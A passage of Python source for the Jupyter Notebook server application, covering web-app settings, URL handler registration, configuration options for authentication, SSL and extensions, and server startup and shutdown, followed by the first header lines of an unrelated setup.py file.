rate_limit_window=jupyter_app.rate_limit_window,
# maximum request sizes - support saving larger notebooks
# tornado defaults are 100 MiB, we increase it to 0.5 GiB
max_body_size = 512 * 1024 * 1024,
max_buffer_size = 512 * 1024 * 1024,
# authentication
cookie_secret=jupyter_app.cookie_secret,
login_url=url_path_join(base_url,'/login'),
login_handler_class=jupyter_app.login_handler_class,
logout_handler_class=jupyter_app.logout_handler_class,
password=jupyter_app.password,
xsrf_cookies=True,
disable_check_xsrf=jupyter_app.disable_check_xsrf,
# managers
kernel_manager=kernel_manager,
contents_manager=contents_manager,
session_manager=session_manager,
kernel_spec_manager=kernel_spec_manager,
config_manager=config_manager,
# Jupyter stuff
started=now,
jinja_template_vars=jupyter_app.jinja_template_vars,
nbextensions_path=jupyter_app.nbextensions_path,
websocket_url=jupyter_app.websocket_url,
mathjax_url=jupyter_app.mathjax_url,
mathjax_config=jupyter_app.mathjax_config,
config=jupyter_app.config,
config_dir=jupyter_app.config_dir,
server_root_dir=root_dir,
jinja2_env=env,
terminals_available=False, # Set later if terminals are available
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
"""Load the (URL pattern, handler) tuples for each component."""
# Order matters. The first handler to match the URL will handle the request.
handlers = []
handlers.extend(load_handlers('tree.handlers'))
handlers.extend([(r"/login", settings['login_handler_class'])])
handlers.extend([(r"/logout", settings['logout_handler_class'])])
handlers.extend(load_handlers('files.handlers'))
handlers.extend(load_handlers('view.handlers'))
handlers.extend(load_handlers('notebook.handlers'))
handlers.extend(load_handlers('nbconvert.handlers'))
handlers.extend(load_handlers('bundler.handlers'))
handlers.extend(load_handlers('kernelspecs.handlers'))
handlers.extend(load_handlers('edit.handlers'))
handlers.extend(load_handlers('services.api.handlers'))
handlers.extend(load_handlers('services.config.handlers'))
handlers.extend(load_handlers('services.kernels.handlers'))
handlers.extend(load_handlers('services.contents.handlers'))
handlers.extend(load_handlers('services.sessions.handlers'))
handlers.extend(load_handlers('services.nbconvert.handlers'))
handlers.extend(load_handlers('services.kernelspecs.handlers'))
handlers.extend(load_handlers('services.security.handlers'))
handlers.append(
(r"/nbextensions/(.*)", FileFindHandler, {
'path': settings['nbextensions_path'],
'no_cache_paths': ['/'], # don't cache anything in nbextensions
}),
)
handlers.append(
(r"/custom/(.*)", FileFindHandler, {
'path': settings['static_custom_path'],
'no_cache_paths': ['/'], # don't cache anything in custom
})
)
# register base handlers last
handlers.extend(load_handlers('base.handlers'))
# set the URL that will be redirected from `/`
handlers.append(
(r'/?', RedirectWithParams, {
'url' : settings['default_url'],
'permanent': False, # want 302, not 301
})
)
# prepend base_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(settings['base_url'], handler[0])
new_handler = tuple([pattern] + list(handler[1:]))
new_handlers.append(new_handler)
# add 404 on the end, which will catch everything that falls through
new_handlers.append((r'(.*)', Template404))
return new_handlers
class NotebookPasswordApp(JupyterApp):
"""Set a password for the notebook server.
Setting a password secures the notebook server
and removes the need for token-based authentication.
"""
description = __doc__
def _config_file_default(self):
return os.path.join(self.config_dir, 'jupyter_notebook_config.json')
def start(self):
from .auth.security import set_password
set_password(config_file=self.config_file)
self.log.info("Wrote hashed password to %s" % self.config_file)
class NbserverListApp(JupyterApp):
version = __version__
description="List currently running notebook servers."
flags = dict(
json=({'NbserverListApp': {'json': True}},
"Produce machine-readable JSON output."),
)
json = Bool(False, config=True,
help="If True, each line of output will be a JSON object with the "
"details from the server info file.")
def start(self):
if not self.json:
print("Currently running servers:")
for serverinfo in list_running_servers(self.runtime_dir):
if self.json:
print(json.dumps(serverinfo))
else:
url = serverinfo['url']
if serverinfo.get('token'):
url = url + '?token=%s' % serverinfo['token']
print(url, "::", serverinfo['notebook_dir'])
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(base_flags)
flags['no-browser']=(
{'NotebookApp' : {'open_browser' : False}},
"Don't open the notebook in a browser after startup."
)
flags['pylab']=(
{'NotebookApp' : {'pylab' : 'warn'}},
"DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib."
)
flags['no-mathjax']=(
{'NotebookApp' : {'enable_mathjax' : False}},
"""Disable MathJax
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
flags['allow-root']=(
{'NotebookApp' : {'allow_root' : True}},
"Allow the notebook to be run from root user."
)
# Add notebook manager flags
flags.update(boolean_flag('script', 'FileContentsManager.save_script',
'DEPRECATED, IGNORED',
'DEPRECATED, IGNORED'))
aliases = dict(base_aliases)
aliases.update({
'ip': 'NotebookApp.ip',
'port': 'NotebookApp.port',
'port-retries': 'NotebookApp.port_retries',
'transport': 'KernelManager.transport',
'keyfile': 'NotebookApp.keyfile',
'certfile': 'NotebookApp.certfile',
'client-ca': 'NotebookApp.client_ca',
'notebook-dir': 'NotebookApp.notebook_dir',
'browser': 'NotebookApp.browser',
'pylab': 'NotebookApp.pylab',
})
#-----------------------------------------------------------------------------
# NotebookApp
#-----------------------------------------------------------------------------
class NotebookApp(JupyterApp):
name = 'jupyter-notebook'
version = __version__
description = """
The Jupyter HTML Notebook.
This launches a Tornado based HTML Notebook Server that serves up an
HTML5/Javascript Notebook client.
"""
examples = _examples
aliases = aliases
flags = flags
classes = [
KernelManager, Session, MappingKernelManager,
ContentsManager, FileContentsManager, NotebookNotary,
KernelSpecManager,
]
flags = Dict(flags)
aliases = Dict(aliases)
subcommands = dict(
list=(NbserverListApp, NbserverListApp.description.splitlines()[0]),
password=(NotebookPasswordApp, NotebookPasswordApp.description.splitlines()[0]),
)
_log_formatter_cls = LogFormatter
@default('log_level')
def _default_log_level(self):
return logging.INFO
@default('log_datefmt')
def _default_log_datefmt(self):
"""Exclude date from default date format"""
return "%H:%M:%S"
@default('log_format')
def _default_log_format(self):
"""override default log format to include time"""
return u"%(color)s[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s]%(end_color)s %(message)s"
ignore_minified_js = Bool(False,
config=True,
help='Deprecated: Use minified JS file or not, mainly use during dev to avoid JS recompilation',
)
# file to be opened in the notebook server
file_to_run = Unicode('', config=True)
# Network related information
allow_origin = Unicode('', config=True,
help="""Set the Access-Control-Allow-Origin header
Use '*' to allow any origin to access your server.
Takes precedence over allow_origin_pat.
"""
)
allow_origin_pat = Unicode('', config=True,
help="""Use a regular expression for the Access-Control-Allow-Origin header
Requests from an origin matching the expression will get replies with:
Access-Control-Allow-Origin: origin
where `origin` is the origin of the request.
Ignored if allow_origin is set.
"""
)
allow_credentials = Bool(False, config=True,
help="Set the Access-Control-Allow-Credentials: true header"
)
allow_root = Bool(False, config=True,
help="Whether to allow the user to run the notebook as root."
)
default_url = Unicode('/tree', config=True,
help="The default URL to redirect to from `/`"
)
ip = Unicode('localhost', config=True,
help="The IP address the notebook server will listen on."
)
@default('ip')
def _default_ip(self):
"""Return localhost if available, 127.0.0.1 otherwise.
On some (horribly broken) systems, localhost cannot be bound.
"""
s = socket.socket()
try:
s.bind(('localhost', 0))
except socket.error as e:
self.log.warning("Cannot bind to localhost, using 127.0.0.1 as default ip\n%s", e)
return '127.0.0.1'
else:
s.close()
return 'localhost'
@validate('ip')
def _valdate_ip(self, proposal):
value = proposal['value']
if value == u'*':
value = u''
return value
port = Integer(8888, config=True,
help="The port the notebook server will listen on."
)
port_retries = Integer(50, config=True,
help="The number of additional ports to try if the specified port is not available."
)
certfile = Unicode(u'', config=True,
help="""The full path to an SSL/TLS certificate file."""
)
keyfile = Unicode(u'', config=True,
help="""The full path to a private key file for usage with SSL/TLS."""
)
client_ca = Unicode(u'', config=True,
help="""The full path to a certificate authority certificate for SSL/TLS client authentication."""
)
cookie_secret_file = Unicode(config=True,
help="""The file where the cookie secret is stored."""
)
@default('cookie_secret_file')
def _default_cookie_secret_file(self):
return os.path.join(self.runtime_dir, 'notebook_cookie_secret')
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
@default('cookie_secret')
def _default_cookie_secret(self):
if os.path.exists(self.cookie_secret_file):
with io.open(self.cookie_secret_file, 'rb') as f:
return f.read()
else:
secret = encodebytes(os.urandom(1024))
self._write_cookie_secret_file(secret)
return secret
def _write_cookie_secret_file(self, secret):
"""write my secret to my secret_file"""
self.log.info("Writing notebook server cookie secret to %s", self.cookie_secret_file)
with io.open(self.cookie_secret_file, 'wb') as f:
f.write(secret)
try:
os.chmod(self.cookie_secret_file, 0o600)
except OSError:
self.log.warning(
"Could not set permissions on %s",
self.cookie_secret_file
)
token = Unicode('<generated>',
help="""Token used for authenticating first-time connections to the server.
When no password is enabled,
the default is to generate a new, random token.
Setting to an empty string disables authentication altogether, which is NOT RECOMMENDED.
"""
).tag(config=True)
one_time_token = Unicode(
help="""One-time token used for opening a browser.
Once used, this token cannot be used again.
"""
)
_token_generated = True
@default('token')
def _token_default(self):
if self.password:
# no token if password is enabled
self._token_generated = False
return u''
else:
self._token_generated = True
return binascii.hexlify(os.urandom(24)).decode('ascii')
@observe('token')
def _token_changed(self, change):
self._token_generated = False
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from notebook.auth import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
password_required = Bool(False, config=True,
help="""Forces users to use a password for the Notebook server.
This is useful in a multi user environment, for instance when
everybody in the LAN can access each other's machine though ssh.
In such a case, server the notebook server on localhost is not secure
since any user can connect to the notebook server via ssh.
"""
)
disable_check_xsrf = Bool(False, config=True,
help="""Disable cross-site-request-forgery protection
Jupyter notebook 4.3.1 introduces protection from cross-site request forgeries,
requiring API requests to either:
- originate from pages served by this server (validated with XSRF cookie and token), or
- authenticate with a token
Some anonymous compute resources still desire the ability to run code,
completely without authentication.
These services can disable all authentication and security checks,
with the full knowledge of what that implies.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webapp_settings = Dict(config=True,
help="DEPRECATED, use tornado_settings"
)
@observe('webapp_settings')
def _update_webapp_settings(self, change):
self.log.warning("\n webapp_settings is deprecated, use tornado_settings.\n")
self.tornado_settings = change['new']
tornado_settings = Dict(config=True,
help="Supply overrides for the tornado.web.Application that the "
"Jupyter notebook uses.")
terminado_settings = Dict(config=True,
help='Supply overrides for terminado. Currently only supports "shell_command".')
cookie_options = Dict(config=True,
help="Extra keyword arguments to pass to `set_secure_cookie`."
" See tornado's set_secure_cookie docs for details."
)
ssl_options = Dict(config=True,
help="""Supply SSL options for the tornado HTTPServer.
See the tornado docs for details.""")
jinja_environment_options = Dict(config=True,
help="Supply extra arguments that will be passed to Jinja environment.")
jinja_template_vars = Dict(
config=True,
help="Extra variables to supply to jinja templates when rendering.",
)
enable_mathjax = Bool(True, config=True,
help="""Whether to enable MathJax for typesetting math/TeX
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
@observe('enable_mathjax')
def _update_enable_mathjax(self, change):
"""set mathjax url to empty if mathjax is disabled"""
if not change['new']:
self.mathjax_url = u''
base_url = Unicode('/', config=True,
help='''The base URL for the notebook server.
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
@validate('base_url')
def _update_base_url(self, proposal):
value = proposal['value']
if not value.startswith('/'):
value = '/' + value
elif not value.endswith('/'):
value = value + '/'
return value
base_project_url = Unicode('/', config=True, help="""DEPRECATED use base_url""")
@observe('base_project_url')
def _update_base_project_url(self, change):
self.log.warning("base_project_url is deprecated, use base_url")
self.base_url = change['new']
extra_static_paths = List(Unicode(), config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the notebook server machine,
or overriding individual files in the IPython"""
)
@property
def static_file_path(self):
"""return extra paths + the default location"""
return self.extra_static_paths + [DEFAULT_STATIC_FILES_PATH]
static_custom_path = List(Unicode(),
help="""Path to search for custom.js, css"""
)
@default('static_custom_path')
def _default_static_custom_path(self):
return [
os.path.join(d, 'custom') for d in (
self.config_dir,
DEFAULT_STATIC_FILES_PATH)
]
extra_template_paths = List(Unicode(), config=True,
help="""Extra paths to search for serving jinja templates.
Can be used to override templates from notebook.templates."""
)
@property
def template_file_path(self):
"""return extra paths + the default locations"""
return self.extra_template_paths + DEFAULT_TEMPLATE_PATH_LIST
extra_nbextensions_path = List(Unicode(), config=True,
help="""extra paths to look for Javascript notebook extensions"""
)
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = self.extra_nbextensions_path + jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
websocket_url = Unicode("", config=True,
help="""The base URL for websockets,
if it differs from the HTTP server (hint: it almost certainly doesn't).
Should be in the form of an HTTP origin: ws[s]://hostname[:port]
"""
)
mathjax_url = Unicode("", config=True,
help="""A custom url for MathJax.js.
Should be in the form of a case-sensitive url to MathJax,
for example: /static/components/MathJax/MathJax.js
"""
)
@default('mathjax_url')
def _default_mathjax_url(self):
if not self.enable_mathjax:
return u''
static_url_prefix = self.tornado_settings.get("static_url_prefix", "static")
return url_path_join(static_url_prefix, 'components', 'MathJax', 'MathJax.js')
@observe('mathjax_url')
def _update_mathjax_url(self, change):
new = change['new']
if new and not self.enable_mathjax:
# enable_mathjax=False overrides mathjax_url
self.mathjax_url = u''
else:
self.log.info("Using MathJax: %s", new)
mathjax_config = Unicode("TeX-AMS-MML_HTMLorMML-full,Safe", config=True,
help="""The MathJax.js configuration file that is to be used."""
)
@observe('mathjax_config')
def _update_mathjax_config(self, change):
self.log.info("Using MathJax configuration file: %s", change['new'])
contents_manager_class = Type(
default_value=LargeFileManager,
klass=ContentsManager,
config=True,
help='The notebook manager class to use.'
)
kernel_manager_class = Type(
default_value=MappingKernelManager,
config=True,
help='The kernel manager class to use.'
)
session_manager_class = Type(
default_value=SessionManager,
config=True,
help='The session manager class to use.'
)
config_manager_class = Type(
default_value=ConfigManager,
config = True,
help='The config manager class to use'
)
kernel_spec_manager = Instance(KernelSpecManager, allow_none=True)
kernel_spec_manager_class = Type(
default_value=KernelSpecManager,
config=True,
help="""
The kernel spec manager class to use. Should be a subclass
of `jupyter_client.kernelspec.KernelSpecManager`.
The Api of KernelSpecManager is provisional and might change
without warning between this version of Jupyter and the next stable one.
"""
)
login_handler_class = Type(
default_value=LoginHandler,
klass=web.RequestHandler,
config=True,
help='The login handler class to use.',
)
logout_handler_class = Type(
default_value=LogoutHandler,
klass=web.RequestHandler,
config=True,
help='The logout handler class to use.',
)
trust_xheaders = Bool(False, config=True,
help=("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL")
)
info_file = Unicode()
@default('info_file')
def _default_info_file(self):
info_file = "nbserver-%s.json" % os.getpid()
return os.path.join(self.runtime_dir, info_file)
pylab = Unicode('disabled', config=True,
help="""
DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
"""
)
@observe('pylab')
def _update_pylab(self, change):
"""when --pylab is specified, display a warning and exit"""
if change['new'] != 'warn':
backend = ' %s' % change['new']
else:
backend = ''
self.log.error("Support for specifying --pylab on the command line has been removed.")
self.log.error(
"Please use `%pylab{0}` or `%matplotlib{0}` in the notebook itself.".format(backend)
)
self.exit(1)
notebook_dir = Unicode(config=True,
help="The directory to use for notebooks and kernels."
)
@default('notebook_dir')
def _default_notebook_dir(self):
if self.file_to_run:
return os.path.dirname(os.path.abspath(self.file_to_run))
else:
return py3compat.getcwd()
@validate('notebook_dir')
def _notebook_dir_validate(self, proposal):
value = proposal['value']
# Strip any trailing slashes
# *except* if it's root
_, path = os.path.splitdrive(value)
if path == os.sep:
return value
value = value.rstrip(os.sep)
if not os.path.isabs(value):
# If we receive a non-absolute path, make it absolute.
value = os.path.abspath(value)
if not os.path.isdir(value):
raise TraitError("No such notebook dir: %r" % value)
return value
@observe('notebook_dir')
def _update_notebook_dir(self, change):
"""Do a bit of validation of the notebook dir."""
# setting App.notebook_dir implies setting notebook and kernel dirs as well
new = change['new']
self.config.FileContentsManager.root_dir = new
self.config.MappingKernelManager.root_dir = new
# TODO: Remove me in notebook 5.0
server_extensions = List(Unicode(), config=True,
help=("DEPRECATED use the nbserver_extensions dict instead")
)
@observe('server_extensions')
def _update_server_extensions(self, change):
self.log.warning("server_extensions is deprecated, use nbserver_extensions")
self.server_extensions = change['new']
nbserver_extensions = Dict({}, config=True,
help=("Dict of Python modules to load as notebook server extensions."
"Entry values can be used to enable and disable the loading of"
"the extensions. The extensions will be loaded in alphabetical "
"order.")
)
reraise_server_extension_failures = Bool(
False,
config=True,
help="Reraise exceptions encountered loading server extensions?",
)
iopub_msg_rate_limit = Float(1000, config=True, help="""(msgs/sec)
Maximum rate at which messages can be sent on iopub before they are
limited.""")
iopub_data_rate_limit = Float(1000000, config=True, help="""(bytes/sec)
Maximum rate at which messages can be sent on iopub before they are
limited.""")
rate_limit_window = Float(3, config=True, help="""(sec) Time window used to
check the message and data rate limits.""")
def parse_command_line(self, argv=None):
super(NotebookApp, self).parse_command_line(argv)
if self.extra_args:
arg0 = self.extra_args[0]
f = os.path.abspath(arg0)
self.argv.remove(arg0)
if not os.path.exists(f):
self.log.critical("No such file or directory: %s", f)
self.exit(1)
# Use config here, to ensure that it takes higher priority than
# anything that comes from the config dirs.
c = Config()
if os.path.isdir(f):
c.NotebookApp.notebook_dir = f
elif os.path.isfile(f):
c.NotebookApp.file_to_run = f
self.update_config(c)
def init_configurables(self):
self.kernel_spec_manager = self.kernel_spec_manager_class(
parent=self,
)
self.kernel_manager = self.kernel_manager_class(
parent=self,
log=self.log,
connection_dir=self.runtime_dir,
kernel_spec_manager=self.kernel_spec_manager,
)
self.contents_manager = self.contents_manager_class(
parent=self,
log=self.log,
)
self.session_manager = self.session_manager_class(
parent=self,
log=self.log,
kernel_manager=self.kernel_manager,
contents_manager=self.contents_manager,
)
self.config_manager = self.config_manager_class(
parent=self,
log=self.log,
)
def init_logging(self):
# This prevents double log messages because tornado use a root logger that
# self.log is a child of. The logging module dipatches log messages to a log
# and all of its ancenstors until propagate is set to False.
self.log.propagate = False
for log in app_log, access_log, gen_log:
# consistent log output name (NotebookApp instead of tornado.access, etc.)
log.name = self.log.name
# hook up tornado 3's loggers to our app handlers
logger = logging.getLogger('tornado')
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.tornado_settings['allow_origin'] = self.allow_origin
if self.allow_origin_pat:
self.tornado_settings['allow_origin_pat'] = re.compile(self.allow_origin_pat)
self.tornado_settings['allow_credentials'] = self.allow_credentials
self.tornado_settings['cookie_options'] = self.cookie_options
self.tornado_settings['token'] = self.token
if (self.open_browser or self.file_to_run) and not self.password:
self.one_time_token = binascii.hexlify(os.urandom(24)).decode('ascii')
self.tornado_settings['one_time_token'] = self.one_time_token
# ensure default_url starts with base_url
if not self.default_url.startswith(self.base_url):
self.default_url = url_path_join(self.base_url, self.default_url)
if self.password_required and (not self.password):
self.log.critical("Notebook servers are configured to only be run with a password.")
self.log.critical("Hint: run the following command to set a password")
self.log.critical("\t$ python -m notebook.auth password")
sys.exit(1)
self.web_app = NotebookWebApplication(
self, self.kernel_manager, self.contents_manager,
self.session_manager, self.kernel_spec_manager,
self.config_manager,
self.log, self.base_url, self.default_url, self.tornado_settings,
self.jinja_environment_options
)
ssl_options = self.ssl_options
if self.certfile:
ssl_options['certfile'] = self.certfile
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
if self.client_ca:
ssl_options['ca_certs'] = self.client_ca
if not ssl_options:
# None indicates no SSL config
ssl_options = None
else:
# SSL may be missing, so only import it if it's to be used
import ssl
# Disable SSLv3 by default, since its use is discouraged.
ssl_options.setdefault('ssl_version', ssl.PROTOCOL_TLSv1)
if ssl_options.get('ca_certs', False):
ssl_options.setdefault('cert_reqs', ssl.CERT_REQUIRED)
self.login_handler_class.validate_security(self, ssl_options=ssl_options)
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders)
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info('The port %i is already in use, trying another port.' % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning("Permission to listen on port %i denied" % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical('ERROR: the notebook server could not be started because '
'no available port could be found.')
self.exit(1)
@property
def display_url(self):
ip = self.ip if self.ip else '[all ip addresses on your system]'
url = self._url(ip)
if self.token:
# Don't log full token if it came from config
token = self.token if self._token_generated else '...'
url = url_concat(url, {'token': token})
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
def init_terminals(self):
try:
from .terminal import initialize
initialize(self.web_app, self.notebook_dir, self.connection_url, self.terminado_settings)
self.web_app.settings['terminals_available'] = True
except ImportError as e:
log = self.log.debug if sys.platform == 'win32' else self.log.warning
log("Terminals not available (error was %s)", e)
def init_signal(self):
if not sys.platform.startswith('win') and sys.stdin.isatty():
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
info = self.log.info
info('interrupted')
print(self.notebook_info())
sys.stdout.write("Shutdown this notebook server (y/[n])? ")
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith('y') and 'n' not in line.lower():
self.log.critical("Shutdown confirmed")
ioloop.IOLoop.current().stop()
return
else:
print("No answer for 5s:", end=' ')
print("resuming operation...")
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
ioloop.IOLoop.current().add_callback(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical("received signal %s, stopping", sig)
ioloop.IOLoop.current().stop()
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
# TODO: this should still check, but now we use bower, not git submodule
pass
def init_server_extensions(self):
"""Load any extensions specified by config.
Import the module, then call the load_jupyter_server_extension function,
if one exists.
The extension API is experimental, and may change in future releases.
"""
# TODO: Remove me in notebook 5.0
for modulename in self.server_extensions:
# Don't override disable state of the extension if it already exist
# in the new traitlet
if not modulename in self.nbserver_extensions:
self.nbserver_extensions[modulename] = True
# Load server extensions with ConfigManager.
# This enables merging on keys, which we want for extension enabling.
# Regular config loading only merges at the class level,
# so each level (user > env > system) clobbers the previous.
config_path = jupyter_config_path()
if self.config_dir not in config_path:
# add self.config_dir to the front, if set manually
config_path.insert(0, self.config_dir)
manager = ConfigManager(read_config_path=config_path)
section = manager.get(self.config_file_name)
extensions = section.get('NotebookApp', {}).get('nbserver_extensions', {})
for modulename, enabled in self.nbserver_extensions.items():
if modulename not in extensions:
# not present in `extensions` means it comes from Python config,
# so we need to add it.
# Otherwise, trust ConfigManager to have loaded it.
extensions[modulename] = enabled
for modulename, enabled in sorted(extensions.items()):
if enabled:
try:
mod = importlib.import_module(modulename)
func = getattr(mod, 'load_jupyter_server_extension', None)
if func is not None:
func(self)
except Exception:
if self.reraise_server_extension_failures:
raise
self.log.warning("Error loading server extension %s", modulename,
exc_info=True)
def init_mime_overrides(self):
# On some Windows machines, an application has registered an incorrect
# mimetype for CSS in the registry. Tornado uses this when serving
# .css files, causing browsers to reject the stylesheet. We know the
# mimetype always needs to be text/css, so we override it here.
mimetypes.add_type('text/css', '.css')
@catch_config_error
def initialize(self, argv=None):
super(NotebookApp, self).initialize(argv)
self.init_logging()
if self._dispatching:
return
self.init_configurables()
self.init_components()
self.init_webapp()
self.init_terminals()
self.init_signal()
self.init_server_extensions()
self.init_mime_overrides()
def cleanup_kernels(self):
"""Shutdown all kernels.
The kernels will shutdown themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
self.log.info('Shutting down kernels')
self.kernel_manager.shutdown_all()
def notebook_info(self):
"Return the current working directory and the server url information"
info = self.contents_manager.info_string() + "\n"
info += "%d active kernels \n" % len(self.kernel_manager._kernels)
return info + "The Jupyter Notebook is running at: %s" % self.display_url
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'secure': bool(self.certfile),
'base_url': self.base_url,
'token': self.token,
'notebook_dir': os.path.abspath(self.notebook_dir),
'password': bool(self.password),
'pid': os.getpid(),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2, sort_keys=True)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def start(self):
""" Start the Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
if not self.allow_root:
# check if we are running as root, and abort if it's not allowed
try:
uid = os.geteuid()
except AttributeError:
uid = -1 # anything nonzero here, since we can't check UID assume non-root
if uid == 0:
self.log.critical("Running as root is not recommended. Use --allow-root to bypass.")
self.exit(1)
super(NotebookApp, self).start()
info = self.log.info
for line in self.notebook_info().split("\n"):
info(line)
info("Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).")
if 'dev' in notebook.__version__:
info("Welcome to Project Jupyter! Explore the various tools available"
" and their corresponding documentation. If you are interested"
" in contributing to the platform, please visit the community"
"resources section at http://jupyter.org/community.html.")
self.write_server_info_file()
if self.open_browser or self.file_to_run:
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning('No web browser found: %s.' % e)
browser = None
if self.file_to_run:
if not os.path.exists(self.file_to_run):
self.log.critical("%s does not exist" % self.file_to_run)
self.exit(1)
relpath = os.path.relpath(self.file_to_run, self.notebook_dir)
uri = url_escape(url_path_join('notebooks', *relpath.split(os.sep)))
else:
# default_url contains base_url, but so does connection_url
uri = self.default_url[len(self.base_url):]
if self.one_time_token:
uri = url_concat(uri, {'token': self.one_time_token})
if browser:
b = lambda : browser.open(url_path_join(self.connection_url, uri),
new=2)
threading.Thread(target=b).start()
if self.token and self._token_generated:
# log full URL with generated token, so there's a copy/pasteable link
# with auth info.
self.log.critical('\n'.join([
'\n',
'Copy/paste this URL into your browser when you connect for the first time,',
'to login with a token:',
' %s' % url_concat(self.connection_url, {'token': self.token}),
]))
self.io_loop = ioloop.IOLoop.current()
if sys.platform.startswith('win'):
# add no-op to wake every 5s
# to handle signals that may be ignored by the inner loop
pc = ioloop.PeriodicCallback(lambda : None, 5000)
pc.start()
try:
self.io_loop.start()
except KeyboardInterrupt:
info("Interrupted...")
finally:
self.remove_server_info_file()
self.cleanup_kernels()
def stop(self):
def _stop():
self.http_server.stop()
self.io_loop.stop()
self.io_loop.add_callback(_stop)
def list_running_servers(runtime_dir=None):
"""Iterate over the server info files of running notebook servers.
Given a runtime directory, find nbserver-* files in the security directory,
and yield dicts of their information, each one pertaining to
a currently running notebook server instance.
"""
if runtime_dir is None:
runtime_dir = jupyter_runtime_dir()
# The runtime dir might not exist
if not os.path.isdir(runtime_dir):
return
for file in os.listdir(runtime_dir):
if file.startswith('nbserver-'):
with io.open(os.path.join(runtime_dir, file), encoding='utf-8') as f:
info = json.load(f)
# Simple check whether that process is really still running
# Also remove leftover files from IPython 2.x without a pid field
if ('pid' in info) and check_pid(info['pid']):
yield info
else:
# If the process has died, try to delete its info file
try:
os.unlink(os.path.join(runtime_dir, file))
except OSError:
pass # TODO: This should warn or log or something
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
main = launch_new_instance = NotebookApp.launch_instance
|
setup.py
|
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
"""Miscellaneous I/O utility functions for setting up the render pipeline.
